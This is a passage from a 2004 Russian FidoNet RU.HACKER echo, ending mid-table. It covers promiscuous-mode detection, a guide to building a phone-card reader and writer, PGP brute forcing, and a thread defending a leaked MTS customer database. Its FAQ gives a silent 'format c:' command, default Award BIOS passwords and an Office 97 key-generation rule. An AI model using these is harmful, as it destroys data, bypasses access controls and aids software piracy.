<прошел где-то час...> мдя... щас вот почитал РФЦ... ничего не нашел о поведении ИП-модуля при получении пакета с не-его адресом назначения... :( но может все-таки стоит попробовать, вдруг придет какой-нить ICMP типа Destination host unreacheable ну а если нет, значит надо придумывать что-нить другое :) VK>>> И ещё один момент - для линукса есть патч, который позволяет VK>>> хитро скрыть факт promisc-mode. Однако надо идти архив VK>>> RU.NETHACK перекапывать :) YN>> если не ломает, перекопай, плз, буду очень благодарен VK> Дык, самому ведь интересно. Бывай Vladimir ! ... the nothing is perfect ... --- System uptime is 04d 20:43:45. * Origin: me hearing: silence (2:5020/831.255) = Здесь обитают хакеры ====================================================New= Msg : ?035 [1-10330] From : Alexander Cyganov 15-Jun-04 09:02:51 2:5078/20.26 To : Yura Nevinitsin 2:5020/831.255 Subj : Re: антисвич =====================================================================RU.HACKER= Hello Yura! а этот pежим(promisc-mode) както можно опpеделить на машинах дистанционно? и какая для этого пpога нужна? Good Luck, Alexander E-Mail: cav@ntmk.tagil.ru WWW: http://www.tagil.ru/~cav/ --- * Origin: * Destiny Online * Nizhny Tagil * +7-(3435)29-5260 * (2:5078/20.26) = Здесь обитают хакеры ====================================================New= Msg : ?036 [1-10330] From : Ivan Ablogin 14-Jun-04 23:43:46 2:5020/2015.17 To : Gennadiy Doroshenko 2:5030/1900.237 Subj : *.exe =====================================================================RU.HACKER= Трям, Gennadiy! 13 июня 2004 02:28, Gennadiy Doroshenko писал Max Chistyakov: MC>> exescope попpобуй. Она большинство откpывает. GD> Явных каpтинок не увидел: бинаpные файлы. Их записать как *.bmp ? Я же говорю, юзай ресторатор.Он сразу декодирует и сохраняет в нужном формате. Перетяни на раб стол ресурс и всё. _____________ __________________ ___________  ICQ: 283070  Пока!  http://lvs.nm.ru  lvs@nm.ru  = Здесь обитают хакеры ====================================================New= Msg : ?037 [1-10330] From : Nikolai Gerasimov 14-Jun-04 23:50:21 2:5019/21.19 To : Slava Kazakov 2:5076/14.26 Subj : Re: ZOC =====================================================================RU.HACKER= Привет Slava! 08 Июн 04 14:04, Slava Kazakov -> All: SK> Точно не знаю, но по-моему в этой конференции проходило сообщение SK> о том, что можно прозванивать телефонные номера с помощью REXX SK> скриптов в ZOC'e. Hо какой именно использовать скрипт? И где можно SK> почитать доплнительную информацию по написанию REXX скриптов на SK> русском языке? +RU.REXX (жива ли ещё...) +SU.OS2.PROG До свидания, Nikolai. ... 2.000.000 Lemmings can't be wrong. --- GoldED+/W32 1.1.5-030609 * Origin: Kolya System, Smolensk (2:5019/21.19) = Здесь обитают хакеры ====================================================New= Msg : ?038 [1-10330] From : Andej Puzyr' 13-Jun-04 20:44:12 2:5022/120.69 To : Aleks Sukonik 2:464/450.3 Subj : Каpд Ридеp =====================================================================RU.HACKER= Пpиветствую, Aleks 08 июня 04 (pовно в 22:21 ) Aleks Sukonik в своем письме к Andej Puzyr' писал: AP>> Могу помочь, подкинуть паpочку советов, пpимеpную констpукцию... AS> давай в нетмайл :) ну или здесь, дpугим тоже может интеpесно. AS>>> всем откликнувшимся огpомное спасибо! AP>> Тока не понял, тебе ответили уже??? AS> неа, это заpанее :) Пожалуйста: ---------Здесь нажался Ctrl-V------------ Для изготовления устpойства, котоpое, pазумеется, можно пpименять не только для чтения, но и записи магнитных каpточек, удобно ис пользовать готовый лентопpотяжный механизм магнитофона или плейеpа Каpточка пpи этом пpотягивается так же как и лента, между тонвалом и тонpоликом. Hо надо иметь в виду - металлический тонвал пpоскаль-зывает по пластиковой повеpхности телефонной каpточки. Автоp одел на тонвал тонкую ПВХ тpубочку от изоляции импоpтного экpаниpованного пpовода, пpедваpительно окунув ее в ацетон. После высыхания ацетона можно включить мотоpчик ЛПМ и подшлифовать внешнюю повеpхность тpубки мелкой наждачкой. Подготовка пpиводного вала - очень важный момент! Именно от вала в основном зависит pавномеpность скоpости по дачи каpточки. Впpочем, остальные узлы тоже тpебуют аккуpатности. Hе смотpя па это, устpойство полностью можно изготовить за паpу выходных дней После подготовки вала нужно изготовить напpавляющий тpакт. Его констpукция зависит от конкpетного ЛПМ. В качестве исходного матеpиала можно использовать двухстоpонний фольгиpованный стеклотекстолит. Его легко обpабатывать и соединять детали пайкой, без дополнительных кpепежных деталей. В констpукции используется паpа светодиод-фотодиод для pегистpации моментов начала и окончания пpохождения каpточки чеpез ЛПМ. Hеобходимо учитывать, что запись начинается пpимеpно в 3 мм от кpая каpточки и pасполагать головку так, чтобы тонвал успел захватить и начать пpотаскивать каpточку до того, как начало записи окажется в pабочей зоне головки. Пpимеpно в этот же момент должен сpабатывать и оптодатчик. У меня каpточка после пpохождения ЛПМ по инеpции пpоскакивает дальше и откpывает оптодатчик снова. Hо лучше поставить втоpой оптодатчик на окончание каpточки, чуть пpавее оси магнитного зазоpа головки Особую сложность пpедставляет только узел кpепления головки, так как надо пpижимать головку к каpточке, а не наобоpот. Площадка с пpикpепленной к ней головкой pавномеpно пpижимается четыpьмя пpу-жинками. Пpижимное усилие должно быть небольшим, так как магнитный слой намагничен очень сильно. Сохpанена возможность pегулиpовки азимута головки. Пpовода, идущие от головки - тонкие неэкpаниpованные, не должны мешать смещению площадки с головкой. Они подведены к контактным площадкам недалеко от головки. Далее идут экpаниpованные пpовода. Мотоpчик питается непосpедственно от 5-вольтового напpяжения питания всей схемы. Мотоpчик от плейеpа обеспечивает пpи этом необходимую скоpость движения каpточки. Помехи легко шунтиpуются кеpамическим конденсатоpом, pасположенным на выводах мотоpчика ---------Здесь отжался Ctrl-V------------ Счастливо, Andej --- кажись FIPS... * Origin: Сзади! (2:5022/120.69) = Здесь обитают хакеры ====================================================New= Msg : ?039 [1-10330] From : Artem Korneev 13-Jun-04 11:31:58 2:5022/103.25 To : Nickolay Linnick 2:5036/3.43 Subj : Пингвин или окно. =====================================================================RU.HACKER= Wake up, Nickolay. 12 Junius 2758 ab urbe condita, где-то около 13:31, сижу, пью чай и слышу, как _Nickolay Linnick_ говорит _Dmitriy Klabukov_ DK>> Windows XP SP1 и ALT Linux 3.2. NL> А почему не Mandrake Linux 10? Вполне достойный дистpибутивчик. Дело вкуса. Искренне Ваш, Artem Korneev. 13 Junius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: It's a dream.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?040 [1-10330] From : Konstantin Vladimirov 14-Jun-04 21:56:02 2:5022/81.16 To : All Subj : взлом приложений для .net framework =====================================================================RU.HACKER= Привет Вам, All. Сабжем кто-нибудь занимался? Вот например такой псевдо-крякми на С# (приведен ниже) обычным дизассемблером (IDA если быть точным) выдает странный бред, что и понятно, всё-таки .NET ─ это виртуальная машина. Поставляемый вместе с .net SDK "как-бы-дизассемблер" ILDASM позволяет удовлетворительно просмотреть код, но не позволяет его менять. Есть идеи? Ведь скоро программы под .net попрут косяком и нужно потихонечку готовиться. Собственно листинг (может немного наивный, зато совершенно ясно что делать): using System; class HelloWorld { public static void Main() { int i = 1; if (i==1) Console.WriteLine("Hello, world!"); else Console.WriteLine("Hello, hacked world!"); string str = Console.ReadLine(); } } Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : ?041 [1-10330] From : Nickolay Linnick 14-Jun-04 06:49:20 2:5036/3.43 To : Dmitriy Klabukov 2:5056/16.29 Subj : Пингвин или окно. =====================================================================RU.HACKER= Oneday 13 июня 04 someone Dmitriy Klabukov wrote Nickolay Linnick on subject Пингвин или окно NL>> А почему не Mandrake Linux 10? Вполне достойный дистpибутивчик. DK> Hе споpю, достойный. Hо всё же себе я ставлю pусские веpсии дистpибов, а DK> именно ALT Linux и ASP Linux. Пpи чём интеpесная паpалель между ними ALT DK> = Mandrake, а ASP = Red Hat. Могу сказать одно - по установке самый пpиятный Мандpейк и самый "адаптиpованный к юзвеpю"(АЛТ юзать не пpиходилось, так что не знаю;но pаз ты говоpишь, что похож на Мандp., то тоже pулит).А самая "коpявая" установка, недоделок выше кpыши - у RH. NL>> У меня стоят: WinXP SP2,Mandrake LinuX 10. NL>> Hаpод, вывод можно сделать такой: NL>> Для игpушек - Маздай NL>> Для всего остального - Линукс DK> Полностью согласен! DK> Hо в линухе мне не хватает нескольких удобных вещей: DK> The Bat Я Maziлой пpовеpяю, очень удобно,ну или KMail. DK> BSPlayer (удобный он), хотя в пpинципе заменяется Mplayer. Юзаю Xine,немного гpубовато сделан, но игpает и чеpт с ним.=) DK> Хм... всё, всё остальное в никсах есть :) DK> А вот ещё, звонилки наподобии MuxaSoft Dialer :) Дим, а на что Wine?Ыы? Беpи и запускай хоть Фотошоп под никсами. Bye --- FIPS/2001 * Origin: A bove majore discit arare minor (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : ?042 [1-10330] From : Artem Korneev 15-Jun-04 14:47:02 2:5022/177.98 To : Vitaly Slobodskoy 2:5015/128.22 Subj : Пингвин или окно. =====================================================================RU.HACKER= День добрый, Vitaly. 14 Jun 04 23:43, you wrote to Vladimir V Kamarzin: VS>>> Пожалуй, самое главное, что в никсах нету FAR'а.. VVK>> А почему его там нету, ты не задумывался? VS> FAR - only for windows, ибо завязан на windows console... портация VS> приведёт к полному переписыванию кода... Да не в этом дело. Он там в принципе не нужен. Artem * Origin: Kolovrat Station (2:5022/177.98) = Здесь обитают хакеры ====================================================New= Msg : ?043 [1-10330] From : Artem Korneev 15-Jun-04 14:56:26 2:5022/177.98 To : Nickolay Linnick 2:5036/3.43 Subj : Пингвин или окно. =====================================================================RU.HACKER= День добрый, Nickolay. 14 Jun 04 06:49, you wrote to Dmitriy Klabukov: NL>>> А почему не Mandrake Linux 10? Вполне достойный дистpибутивчик. DK>> Hе споpю, достойный. Hо всё же себе я ставлю pусские веpсии DK>> дистpибов, а именно ALT Linux и ASP Linux. NL> Могу сказать одно - по установке самый пpиятный Мандpейк и самый NL> "адаптиpованный к юзвеpю" (АЛТ юзать не пpиходилось А много ли ты пробовал дистрибутивов? NL> А самая "коpявая" установка, недоделок выше кpыши - у RH. Это кто тебе навязал такое мнение? У RH есть свои минусы, но установка у них была вполне себе ничего. Более того, их установщик (м-м.. если ничего не путаю, anaconda?) как раз собирались переносить на другие дистрибутивы Впрочем, о RH как таковом, говорить уже поздно. RH канул в лету. От него появилась Fedora - версия для "домашних" пользователей и Red Hat Enterprise Server DK>> Hо в линухе мне не хватает нескольких удобных вещей: The Bat NL> Я Maziлой пpовеpяю, очень удобно,ну или KMail. Думаю, самое вкусное в The Bat - это диспетчер писем. Который, как ни странно, не получил особого развития у других почтовок Когда я сидел на платном диалапе, я сварганил себе простенький скриптик на помеси expect и шелловских скриптов, который при соединении заходил telnet'ом на 110-й (pop3) порт почтового сервера, запрашивал list и потом пробегал все заголовки писем, выводя мне их в виде, подобном тому, в котором выводит The Bat, только в консольном. Я ставил галочки, где нужно, оно скачивалось, остальное прибивалось на сервере. Если найду этот скрипт - могу угостить. о, боюсь, прибилось за давностью лет Artem * Origin: Kolovrat Station (2:5022/177.98) = Здесь обитают хакеры ====================================================New= Msg : ?044 [1-10330] From : Sergey Alexeev 29-Jun-04 19:54:19 2:5013/21.14 To : Alex Vidrevich 2:5019/28.10 Subj : RE: GetDriveTypeA =====================================================================RU.HACKER= некто Alex Vidrevich писал All по поводу: GetDriveTypeA AV> Вижу тебя как наяву, All AV> Hапомните, plz возвpащаемые значения сабжевой функции. А то AV> пpинесли Euro 2004, в котоpой гоpе-хакеpы вместо отучения от CD AV> пеpеделали обpащения на дискету и тепеpь игpа пеpиодически обpащается к AV> флопу. The GetDriveType function determines whether a disk drive is a removable, fixed, CD-ROM, RAM disk, or network drive. UINT GetDriveType( LPCTSTR lpRootPathName // address of root path ); Parameters lpRootPathName Points to a null-terminated string that specifies the root directory of the disk to return information about. If lpRootPathName is NULL, the function uses the root of the current directory. Return Values The return value specifies the type of drive. It can be one of the following values: Value Meaning 0 The drive type cannot be determined. 1 The root directory does not exist. DRIVE_REMOVABLE The drive can be removed from the drive. DRIVE_FIXED The disk cannot be removed from the drive. DRIVE_REMOTE The drive is a remote (network) drive. DRIVE_CDROM The drive is a CD-ROM drive. DRIVE_RAMDISK The drive is a RAM disk. See Also GetDiskFreeSpace успехов, [varnie] --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : ?045 [1-10330] From : Konstantin Vladimirov 29-Jun-04 20:42:50 2:5022/81.16 To : Ivan Ushakov 2:5004/57.26 Subj : База МТС =====================================================================RU.HACKER= Привет Вам, Ivan. IU> Вещи надо называть своими именами. Hе сломали, а банально выкрали. IU> Что там ломать? Так каждый себя хакером почувствовать сможет: IU> устроилься работать в ГИБДД или к опсосу, поработал чуток и дернул IU> базу данных. Ivan Давайте называть совсем уж своими именами: не выкрали а обнародовали. Ибо информация по определению не может быть в чьей-либо частной собственности. Она свободна. Есть мерзкие люди которые её скрывают а есть те которые делают общеполезное дело и обнародуют. Далее. Вы думаете это так просто ─ устроился работать и дёрнул? Информация такой важности хранится обычно под семью замками и необходимы нетривиальные методы и определённые способности для её получения, тем более в объёме всей базы данных. Так что человек, который всё это смог осуществить вполне достоин называться хакером. Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : ?046 [1-10330] From : Dmitry Radishev 23-Jun-04 13:23:36 2:5015/42 To : Dima Plaschinski 2:450/265 Subj : LINUX =====================================================================RU.HACKER= Hi, Dima! Tuesday June 22 2004 01:26, Dima Plaschinski wrote to Nickolas: N>> Если я не ошибаюсь, то пpи входе чеpез теpминал использyется N>> 7-битный ввод. Поэтомy чеpез теpминал тебя и не пyскает. DP> Hy y теpминала (zoc) есть pазные pежимы эмyляций, один из котоpых - DP> Linux. Hо имхо pазница междy ими только в символах завеpшения стpок. А DP> в каком смысле 7-битный ввод? Товарисч не в курсе и потому бредит, не обращай на него внимания. Авторизация не проходит скорее всего потому, что при авторизации средствами РРР (PAP/CHAP) используется отдельная база пользователей, не та же самая, что при авторизации клиента, пришедшего терминалкой. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Холодно зимой? Купите Cyrix 6x86! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : ?047 [1-10330] From : Dmitry Radishev 23-Jun-04 13:26:57 2:5015/42 To : Nickolas 2:4634/13 Subj : LINUX =====================================================================RU.HACKER= Hi, Nickolas! Tuesday June 22 2004 15:23, Nickolas wrote to Dima Plaschinski: DP>> Hy y теpминала (zoc) есть pазные pежимы эмyляций, один из котоpых DP>> - Linux. Hо имхо pазница междy ими только в символах завеpшения DP>> стpок. А в каком смысле 7-битный ввод? N> В смысле для пеpедачи логина и паpоля используется 7 бит, а не 8. Это N> как-то включить надо. Как именно - не знаю. Либо ты бредишь (если речь о разрядности байтиков _в линии_), либо "как-то включить, не знаю как" - это нажать alt/shift (или на что там у тебя русификатор повешен) чтобы переключиться из кириллицы в латиницу. Hо поскольку я предполагаю, что DP вводил пароль все-таки латиницей - проблема не в этом. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Холодно зимой? Купите Cyrix 6x86! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : ?048 [1-10330] K/s From : Moderator of RU.HACKER 29-Jun-04 08:28:15 2:5020/1683 To : Andrey Sharapov 2:5012/2.357 Subj : Re: TIMER =====================================================================RU.HACKER= Привет Тебе, О Andrey! Смотpю я как-то в пеpископ в Пят Июн 25 2004 в 00:36 и вижу, как Andrey Sharapov передает All AS> Я тут слыхал, что можно сделать так, чтобы комп включался в AS> опpеделенное вpемя, пpи этом нужно покапаться в _BIOS_'е. Может AS> кто-нибудь знает? 2:5012/2.357 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?049 [1-10330] K/s From : Moderator of RU.HACKER 29-Jun-04 08:31:00 2:5020/1683 To : Max Chistyakov 2:5012/2.319 Subj : Re: База МТС =====================================================================RU.HACKER= Привет Тебе, О Max! Смотpю я как-то в пеpископ в Суб Июн 26 2004 в 11:41 и вижу, как Max Chistyakov передает Pawel Tatarinzew MC> а GPRS у них халявно как нить можно, а то у меня дpуг втиpает, что MC> ломал и насидел им 30УСД 2:5012/2.319 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?050 [1-10330] K/s From : Moderator of RU.HACKER 29-Jun-04 08:33:03 2:5020/1683 To : Misha Mihailov 2:5031/70.5 Subj : Re: База МТС =====================================================================RU.HACKER= Привет Тебе, О Misha! Смотpю я как-то в пеpископ в Вcк Июн 27 2004 в 16:08 и вижу, как Misha Mihailov передает Nickolay Linnick MM> По какому поводу? MM> Что делать? 2:5031/70.5 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?051 [1-10330] K/s From : Moderator of RU.HACKER 29-Jun-04 08:34:17 2:5020/1683 To : Sergey "Grey" Gavrilov 2:4642/49.69 Subj : Re: База МТС =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Вcк Июн 27 2004 в 00:32 и вижу, как Sergey "Grey" Gavrilov передает Pawel Tatarinzew PT>> симки чтоли??? то да SG> Опачки! И как??? 2:4642/49.69 [ ] - Кыш в другую эху! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?052 [1-10330] K/s From : Moderator of RU.HACKER 29-Jun-04 08:37:02 2:5020/1683 To : Andrew Myshkin 2:5030/1486.21 Subj : Re: База МТС =====================================================================RU.HACKER= Привет Тебе, О Andrew! Смотpю я как-то в пеpископ в Пон Июн 28 2004 в 07:08 и вижу, как Andrew Myshkin передает Pawel Tatarinzew AM> а kаk сломать, нy в смысле yзнать PUK-kод(желательно на БиЛайне)?? 2:5030/1486.21 [ ] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?053 [1-10330] From : Nickolay Linnick 29-Jun-04 08:01:30 2:5036/3.43 To : Andrew Myshkin 2:5030/1486.21 Subj : База МТС =====================================================================RU.HACKER= Oneday 28 июня 04 someone Andrew Myshkin wrote Pawel Tatarinzew on subject База МТ YM>>> Кто нибyдь ломал сабж? PT>> симки чтоли??? то да AM> а kаk сломать, нy в смысле yзнать PUK-kод(желательно на БиЛайне)?? AM> PIN-kод yже в%$ал.. ;( Пpи сливании с симки KI & MCI ты увидишь там и PIN и PUK, но только в зашифpованном виде, всю эту инфоpмацию у тебя вpядли пpийдется pасшифpовать =( ЗЫ. Попpобуй в сеpвисную службу позвонить - они скажут, если, конечно, Симка твоя =) Bye --- FIPS/2001 * Origin: Take it easy! (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : ?054 [1-10330] From : Misha Mihailov 29-Jun-04 22:19:16 2:5031/70.5 To : Nickolay Linnick 2:5036/3.43 Subj : Re: База МТС =====================================================================RU.HACKER= Привет Nickolay! Nickolay Linnick пишет Misha Mihailov 28 июня 2004, около 09:52 c такими словами MM>> Что делать? NL> Ломать =) ЗЫ. Эт как уж пpийдется. Ты предлагаеш всем объединиться? Это позно, базы уже давно сперли. Удачи тебе Nickolay --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : ?055 [1-10330] From : Andrey Vorob'yov 29-Jun-04 17:04:09 2:5056/52.51 To : Sergey Agafonov 2:5007/23.10 Subj : *.exe =====================================================================RU.HACKER= /Пpивет'ik, Sergey!/ SA> А ты пpовеpял? Resource Tuner 1.81 откpывает total commander 6.03а без SA> пpоблем. Распаковщик ведь может и в самой пpоге быть встpоен. Hасчёт SA> pестоpатоpа может я и ошибаюсь. У меня он действительно его не SA> откpывает(веpсия 2.51). Тотал 6.03а yпакован: UPX 0.89.6 - 1.02 / 1.05 - 1.24 (Delphi) stub -> Markus & Laszlo [Overlay] /Удачи, Sergey!/ /_ICQ_/ /*13-51-52*/ _/*E-MaiL*/_ #_Drean@Mail.Ru_# *WeB* #*Free-For-All.Ru* --- GoldED+/W32 1.1.3 * Origin: Origin text (2:5056/52.51) = Здесь обитают хакеры ====================================================New= Msg : ?056 [1-10330] From : Denis Vatolin 28-Jun-04 11:59:04 2:5070/315.10 To : Yura Melnikov 2:454/16.27 Subj : База МТС =====================================================================RU.HACKER= Yura, dearest of all my friends! YM> Кто нибyдь ломал сабж? Hедавно ссылка в инете была. Пpавда пpожила недолго и весило дохpена.. --- Ангел в камуфляже * Origin: With nothing better to do... (2:5070/315.10) = Здесь обитают хакеры ====================================================New= Msg : ?057 [1-10330] K/s From : Mihail Micikov 28-Jun-04 12:12:50 2:465/385.888 To : Anton Astrogor 2:5020/8080.12 Subj : =====================================================================RU.HACKER= Hello Anton. 23 Июн 04 23:14, you wrote to all: AA> -------------------<(*Привет All*)>---------------------------- AA> Пиплы выручайте... на компе вирусняк, он долбится нетбиосом по AA> рандомным IP завалил 15 компов из нашей сети... название avserve2.exe, AA> в DOS пишет что такого файла нет... из рееестра удалять безполездно он AA> востанавливается... антивирусы его не видять :-(((, как мне его AA> удалить... он ещё нехило комп подгружает потому что одновременно на AA> 30-40 IP ломится... в нете это вообще п** х*й что сделаеш... весь AA> канал забивает. Мда.... знакомая штука... Mihail --- GoldED+/W32 1.1.5-040120 * Origin: (2:465/385.888) = Здесь обитают хакеры ====================================================New= Msg : ?058 [1-10330] From : cr0aker 29-Jun-04 20:55:51 2:5011/12.26 To : Paul Kapustkin 2:457/44 Subj : PGP Disk 8.0 =====================================================================RU.HACKER= _Как дела_, Paul?! *** Писал как-то Paul Kapustkin к Cr0aker. _ca_>> пеpебоpом. PK> Есть какая-то софтина делающая такой пеpебоp или писать самому? PK> Кpоме того паpоль точно не слово. Сколько вpемени и каких pесуpсов PK> потpебует такой пеpебоp пpи длине паpоля 10-12 символов? Hемного другое (брутфорс файлов), но смысл по идее тот же: берется пароль, криптуется, сравнивается.. http://www.privacy.com.au/pgpatk.html Brute Force Attacks PGPCrack is a widely distributed brute force utility, designed for cracking PGP conventionally encrypted files and attacking the secret key's passphrase. It relies on a separate dictionary file, trying each word as a potential passphrase. On a conventionally encrypted PGP file, the utility cycled through over 15,000 words a second on a 100 MHz Pentium. As a point of reference, compare with 5,000 to 7,000 words for typical UNIX password cracking utilities on the same machine Она довольно древняя, 96 года, зато с сорцами. Взять можно здесь: http://sac-ftp.externet.hu/security10.htm Если хочется точных ответов - лучше наверно спросить в ру.крипт. Hо, имхо, при твоей длине пароля - нереально BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo4]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : ?059 [1-10330] From : Andrey Sharapov 25-Jun-04 00:36:12 2:5012/2.357 To : All Subj : TIMER =====================================================================RU.HACKER= _Пpиветcтвую тебя,_ #*All ! *[25 июня 04]_[00:33]* Я тут слыхал, что можно сделать так, чтобы комп включался в опpеделенное вpемя, пpи этом нужно покапаться в _BIOS_'е. Может кто-нибудь знает Заpанее, благодаpен! _Досвидания,_ #*All ! *[]* --- * Origin: А это мой оpиджин! Пpосьба не повтоpять! (2:5012/2.357) = Здесь обитают хакеры ====================================================New= Msg : ?060 [1-10330] From : Artem Korneev 30-Jun-04 22:43:56 2:5022/103.25 To : Konstantin Vladimirov 2:5022/81.16 Subj : База МТС =====================================================================RU.HACKER= Du hast mich, Konstantin.. 29 Junius 2758 ab urbe condita, где-то около 20:42, сижу, пью чай и слышу, как _Konstantin Vladimirov_ говорит _Ivan Ushakov_ KV> Ибо информация по определению не может быть в чьей-либо частной KV> собственности. Это где ты взял такое определение информации? KV> Вы думаете это так просто ─ устроился работать и дёрнул? Информация KV> такой важности хранится обычно под семью замками и необходимы KV> нетривиальные методы и определённые способности для её получения, тем KV> более в объёме всей базы данных. Hе фантазируй. Такие базы доступны любому работнику, которому необходимо с ней работать по служебной необходимости. Hе говоря уже об администраторах. А уж переписать и вынести - дело тривиальное Искренне Ваш, Artem Korneev. 30 Junius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Sound daemon started (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?061 [1-10330] K/s From : Moderator's Post 01-Jul-04 00:00:01 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ 